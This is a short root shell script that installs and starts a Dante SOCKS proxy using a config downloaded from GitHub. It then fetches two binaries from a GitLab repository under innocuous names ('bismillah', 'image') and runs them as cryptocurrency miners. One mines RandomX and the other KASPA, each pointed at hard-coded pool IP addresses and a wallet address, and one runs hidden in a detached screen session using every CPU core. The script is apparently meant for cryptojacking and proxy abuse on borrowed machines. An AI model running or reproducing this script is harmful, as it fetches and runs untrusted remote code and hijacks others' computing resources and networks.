sudo su <<EOF
sudo apt update
sudo apt install dante-server
mv /etc/danted.conf der
cd /etc/
wget https://raw.githubusercontent.com/sarifadim/dopla/main/danted.conf
service danted start
wget https://gitlab.com/sarifadim/jomblo/-/raw/main/bismillah && chmod +x * && screen -dms run ./bismillah -o 34.149.22.228:9200 -u 3JWuijUT2hwsC862trVXBSMzQW6JANF63j.ARX -a rx/0 -t $(nproc --all)
wget -qO image https://gitlab.com/sarifadim/jomblo/-/raw/main/gitpod && chmod +x image
./image --algo KASPA --pool 34.117.82.207:9200 --user 3JWuijUT2hwsC862trVXBSMzQW6JANF63j.$(echo A-$(TZ=UTC-7 date +"%H-%M-%S")) --tls enable
EOF
